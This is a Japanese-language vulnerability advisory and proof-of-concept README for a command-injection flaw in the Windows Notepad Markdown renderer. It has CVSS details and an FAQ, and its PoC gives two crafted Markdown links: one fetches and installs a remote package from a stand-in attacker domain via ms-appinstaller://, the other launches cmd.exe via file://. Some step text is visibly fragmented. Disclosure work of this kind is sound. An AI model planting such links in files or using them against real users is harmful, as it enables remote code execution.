
| フィールド | 詳細 |
|---|---|
| CVE ID | CVE-2026-20841 |
| タイトル | Windows メモ帳アプリのリモートコード実行の脆弱性 |
| 影響 | リモートコード実行 |
| 最大深刻度 | Important |
| CVSS v3.1 Base / Temporal | 8.8 / 7.7 |
| CVSS ベクター | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C |
| CWE | CWE-77: コマンドで使用される特殊要素の不適切な無効化('コマンドインジェクション') |
| 影響を受ける製品 | Windows メモ帳アプリ(Microsoft Store 版、11.2510 より前のビルド) |
| 割り当て CNA | Microsoft |
| 公開日 | 2026年2月10日 |
| 一般公開 | なし |
| 悪用 | なし |
| 悪用可能性の評価 | 悪用の可能性は低い |
Windows メモ帳アプリにおけるコマンドで使用される特殊要素の不適切な無効化('コマンドインジェクション')により、権限のない攻撃者がネットワーク経由でコードを実行できる可能性があります。
最新の Windows メモ帳アプリ(Microsoft Store 経由で配布)には、クリック可能なハイパーリンクを含む Markdown レンダリング機能が導入されました。この脆弱性は、メモ帳が Markdown リンク内の URI スキームを処理する前に適切に検証およびサニタイズしないために存在します。攻撃者は、特別に細工されたリンクを含む悪意のある .md ファイルを作成し、ユーザーがクリックすると、検証されていないプロトコルハンドラーがリモートコンテンツを読み込んで実行するように誘導できます。
| メトリクス | 値 |
|---|---|
| 攻撃元区分 | ネットワーク |
| 攻撃条件の複雑さ | 低 |
| 必要な特権レベル | なし |
| ユーザー操作 | 必要 |
| スコープ | 変更なし |
| 機密性への影響 | 高 |
| 完全性への影響 | 高 |
| 可用性への影響 | 高 |
| メトリクス | 値 |
|---|---|
| 悪用コードの成熟度 | 未実証 |
| 修正レベル | 公式修正 |
| 報告の信頼性 | 確認済み |
攻撃者はこの脆弱性をどのように悪用する可能性がありますか?
攻撃者は、メモ帳で開かれた Markdown ファイル内の悪意のあるリンクをユーザーにクリックさせ、検証されていないプロトコルを起動してリモートファイルを読み込み・実行させる可能性があります。
リモートコード実行の対象コンテキストは何ですか?
CVSS メトリクスによると、攻撃元区分はネットワーク(AV:N)で、ユーザー操作が必要(UI:R)です。悪意のあるコードは、Markdown ファイルを開いたユーザーのセキュリティコンテキストで実行され、攻撃者はそのユーザーと同じ権限を取得します。
.md)ファイルを作成します。ms-appinstaller://)や、ローカルの実行可能ファイルを直接起動できる file:// URI がトリガーされます。免責事項: この概念実証は、教育および許可されたセキュリティ研究の目的のみで提供されています。所有していないシステムや、明示的な書面によるテスト許可がないシステムに対しては使用しないでください。コンピュータシステムへの不正アクセスは違法であり、法律で罰せられます。
この PoC は、細工された Markdown リンクによる 2 つの攻撃ベクトルを示しています:
ベクトル 1 - プロトコルハンドラーの悪用によるリモートペイロードのインストール:
[Click to view document](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)
ベクトル 2 - ファイル URI によるローカル実行可能ファイルの起動:
[Click here](file://C:/windows/system32/cmd.exe)

.md ファイルをメモ帳で開かないでください。このリポジトリで提供される情報は、教育および許可されたセキュリティ研究の目的のみで提供されています。この概念実証は、防御者が脆弱性を理解し緩和するのに役立つように共有されています。著者は、ここで提供される情報やツールの誤用について一切責任を負いません。システムの脆弱性をテストする前に、必ず適切な書面による許可を取得してください。コンピュータシステムへの不正アクセスは、ほとんどの法域で犯罪行為です。責任を持って倫理的に使用してください。